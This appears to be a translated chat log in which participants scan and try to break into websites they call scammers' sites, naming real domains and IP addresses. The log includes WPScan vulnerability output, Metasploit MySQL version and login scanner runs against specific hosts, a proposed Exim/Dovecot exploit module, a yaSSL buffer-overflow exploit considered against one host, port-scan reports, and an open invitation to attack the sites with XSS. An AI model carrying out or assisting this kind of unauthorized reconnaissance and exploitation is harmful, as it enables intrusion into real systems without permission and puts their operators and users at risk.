duangsues.is_a? SaltedFish
Just compare with the ops quality of LWL12.com 🌚
~~Cute girl~~ LWL12
[+] URL: https://blog.lwl12.com/
[+] robots.txt available under: 'https://blog.lwl12.com/robots.txt'
[+] Interesting entry from robots.txt: https://blog.lwl12.com/wp-
[+] WordPress version 4.9.5 (Released on 2018-04-03) identified from stylesheets numbers, advanced fingerprinting, links opml
[+] No plugins found
[+] Requests Done: 41
[+] Elapsed time: 00:00:07
Versus the scammers
[+] robots.txt available under: 'https://mightficent.com/robots.txt'
[+] Interesting entry from robots.txt: https://mightficent.com/wp-admin/admin-ajax.php
[+] WordPress version 4.8.3 (Released on 2017-10-31) identified from meta generator, links opml
[!] 10 vulnerabilities identified from the version number
[!] Title: WordPress 2.3-4.8.3 - Host Header Injection in Password Reset
[!] Title: WordPress 2.8.6-4.9 - Authenticated JavaScript File Upload
[!] Title: WordPress 3.7-4.9.1 - MediaElement Cross-Site Scripting (XSS)
[!] Title: WordPress Slider Revolution Shell Upload
[+] Requests Done: 402
[+] Elapsed time: 00:10:04
duangsues.is_a? SaltedFish
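[+] WordPress version 4.8.3 (Released on 2017-10-31) identified from meta generator, links opml
Start from this one
Right now, for 动苏, only a shell (getting control of the virtual host) and bypass auth (cPanel's or WordPress's admin) are valuable, even though there really are quite a few vulnerabilities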
duangsues.is_a? SaltedFish
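Many of them are WordPress sites; if you don't believe it, WPScan them. These sites are actually all virtual hosts split off from voukgroup.org (103.233.0.244); the former uses cPanel, WordPress 4.8.6 and RHEL6 https://t.iss.one/dsuses/1357 Registered by people from their "company": https://charity100.org https://macademy.asia # uses CF protection https://makefamousnow.com https://mega7holding.com…
XSS enthusiasts can go XSS one; some of the sites are open too 🌝
I don't have a public-facing server here, too bad.... ( otherwise I could use it for XSS too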
msf auxiliary(scanner/mysql/mysql_version) > run -j
[*] Auxiliary module running as background job 2.
[*] 103.233.0.244:3306 - 103.233.0.244:3306 is running MySQL, but responds with an error: \x04Host '27.27.54.51' is not allowed to connect to this MySQL server
[*] 103.233.0.244:3306 - Scanned 1 of 1 hosts (100% complete)
duangsues.is_a? SaltedFish
use exploit/linux/smtp/exim4_dovecot_exec might work; port 587 on voukgroup.org and the other domains is running dovecot Exim
duangsues.is_a? SaltedFish
Rough report: 45.62.110.178.16clouds.com 80: Apache 2.2.15 bwg, reachable normally, received a list of URLs Linux 2.6 (CentOS) mmallv2u.net 80:Tengine 443:ssl 843:adobe-crossdomain 1935:tcpwrapped Tiandy NVR (89%), IPCop 2 firewall (Linux 3.4) (87%), Linux 3.2 (87%) 103.208.220.66 22:ssh…
msf auxiliary(scanner/mysql/mysql_login) > set RHOSTS m-darts.com
RHOSTS => m-darts.com
msf auxiliary(scanner/mysql/mysql_login) > run
[+] 110.4.45.141:3306 - 110.4.45.141:3306 - Found remote MySQL version 5.5.58
msf auxiliary(scanner/mysql/mysql_login) > use exploit/linux/mysql/mysql_yassl_hello
msf exploit(linux/mysql/mysql_yassl_hello) > info
Platform: Linux
This module exploits a stack buffer overflow in the yaSSL (1.7.5 and
earlier) implementation bundled with MySQL <= 6.0. By sending a
specially crafted Hello packet, an attacker may be able to execute
arbitrary code.
Maybe 🌚 — no good, their version is still too high 🌑